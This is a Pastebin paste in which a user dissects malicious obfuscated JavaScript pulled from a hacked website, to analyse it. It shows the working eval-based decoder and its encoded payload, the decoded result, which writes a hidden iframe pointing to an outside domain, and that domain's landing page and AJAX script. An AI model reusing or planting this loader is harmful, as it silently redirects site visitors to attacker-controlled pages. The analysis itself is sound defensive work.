API tools faq
paste
Advertisement
dirgotronix

Javascript Obfuscation - virus

dirgotronix
Apr 3rd, 2011
353
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 3.92 KB | None | 0 0
raw download clone embed print report
  1. // This code was pulled from a hacked website on a rooted server.  It is identified as a virus. It was deconstructed and rebuilt in c# to sort out its purpose, which is to print an iframe.  That code can be found here: http://pastebin.com/090yyjb5
  2.  
  3. <script language=JavaScript>    function vzxbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,13,0,37,18,42,51,52,30,35,0,0,0,0,0,0,8,36,34,53,50,10,2,60,1,58,57,62,33,24,43,20,32,56,12,4,38,6,41,29,26,31,44,0,0,0,0,25,0,55,11,9,7,46,40,54,21,27,17,23,3,59,61,48,49,45,22,28,15,5,16,47,19,14,39);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(169^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}vzxbnb25('8lGp1iZad5Wa@a1aXxV9qiGpRmfA1iZDsxR6danL8w1oW6sPyrcotw1DS6sBd9RpRx_6vDRTc5ngExJBHaWa_tVLUIVg_6R61Y@od0ZpUgqLrIfPA9saHYQgU6np1d@J@aWode1DdaZpSd@PlBcAv5Jz2Ef91lc6MIfPyeMB8ls6WdR3ie_zcUR62msoWx_AvTfgWlWpRxJB1lZg_kRDvtJpUYR6b8_3UFG6i9RpRYV92F')</script>
  4.  
  5. //result: "window.status='Done';document.write('<iframe name=d9e1 src=\"http://7speed.info/t/?'+Math.round(Math.random()*19936)+'d9e1'+'\" width=224 height=89 style=\"display:none\"></iframe>')"
  6.  
  7. // the page pulled from that result:
  8.  
  9. <html>
  10.  
  11. <head>
  12. <title>7speed.info</title>
  13. <script type="text/javascript" src="/js/general.js"></script>
  14. <script type="text/javascript">
  15. ChkRequestEnc('YToyMjp7aTowO3M6MTk6IjIwMTEtMDQtMDQgMDQ6MDI6NDUiO2k6MTtzOjc6IjU0Mjg5NTkiO2k6MjtOO2k6MztzOjEwOiJXZ2V0LzEuOS4xIjtpOjQ7czoxMzoiL3QvPzE5OTM2ZDllMSI7aTo1O3M6MTI6IjIwOC41NC4zOC41OSI7aTo2O3M6MToiMiI7aTo3O3M6MToiYiI7aTo4O3M6MDoiIjtpOjk7czoyOiJVUyI7aToxMDtzOjEwOiJXQVNISU5HVE9OIjtpOjExO3M6ODoiSVNTQVFVQUgiO2k6MTI7czo2OiIzMDk2OTIiO2k6MTM7czoxMToiN3NwZWVkLmluZm8iO2k6MTQ7czo3MToiaHR0cDovL3NlYXJjaHBvcnRhbC5pbmZvcm1hdGlvbi5jb20vP29faWQ9MTM2NTk4JmRvbWFpbm5hbWU9N3NwZWVkLmluZm8iO2k6MTU7TjtpOjE2O047aToxNztOO2k6MTg7TjtpOjE5O047aToyMDtOO2k6MjE7Tjt9');
  16. </script>
  17. <script type="text/javascript">
  18.  
  19. </script>
  20. </head>
  21.  
  22. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
  23.   <!-- SCC a2 -->
  24.   <frame src="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">
  25.  
  26. <noframes>
  27. <body bgcolor="#ffffff" text="#000000">
  28.   <a href="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">Click here to enter</a>.
  29. </body>
  30. </noframes>
  31. </frameset>
  32.  
  33. // the javascript referenced above: general.js
  34.  
  35. ////////////////////////////////////////////////////////////////////
  36. // XML functions and AJAX things
  37. ////////////////////////////////////////////////////////////////////
  38.  
  39. var xmlHttp;
  40.  
  41. function ChkRequestEnc(Encoded)
  42. {
  43.     xmlHttp = GetXmlHttpObject()
  44.     if(xmlHttp==null)
  45.     {
  46.         alert("Browser does not support HTTP Request");
  47.         return false;
  48.     }
  49.     var SesId = SesId;
  50.     var urlPass = "/check_image.php?enc=" + escape(Encoded);
  51.     urlPass = urlPass + "&rand="+Math.random();
  52. //  alert(urlPass);
  53.     xmlHttp.onreadystatechange = fillMessage;
  54.     urlPass = new String(urlPass);
  55.     xmlHttp.open("GET",urlPass);
  56.     xmlHttp.send(null);
  57.     return true;
  58. }
  59.  
  60. function ChkPopunderEnc(Encoded)
  61. {
  62.     xmlHttp = GetXmlHttpObject();
  63.     if(xmlHttp==null)
  64.     {
  65.         alert("Browser does not support HTTP Request");
  66.         return false;
  67.     }
  68.     var SesId = SesId;
  69.     var urlPass = "/check_popunder.php?enc=" + escape(Encoded);
  70.     urlPass = urlPass + "&rand="+Math.random();
  71. //  alert(urlPass);
  72.     xmlHttp.onreadystatechange = fillMessage;
  73.     urlPass = new String(urlPass);
  74.     xmlHttp.open("GET",urlPass);
  75.     xmlHttp.send(null);
  76.     return true;
  77. }
  78.  
  79. function fillMessage()
  80. {
  81.     if(xmlHttp.readyState==4 || xmlHttp.readyState=="complete")
  82.     {
  83. //      x = document.getElementById('imp_msg');
  84. //      x.innerHTML = xmlHttp.responseText;
  85. //      alert(xmlHttp.responseText);
  86.         return true;
  87.     }
  88. }
  89.  
  90. function GetXmlHttpObject()
  91. {
  92.     var objXMLHttp=null;
  93.     if(window.XMLHttpRequest)
  94.     {
  95.         objXMLHttp=new XMLHttpRequest();
  96.     }
  97.     else if(window.ActiveXObject)
  98.     {
  99.         objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP");
  100.     }
  101.     return objXMLHttp;
  102. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!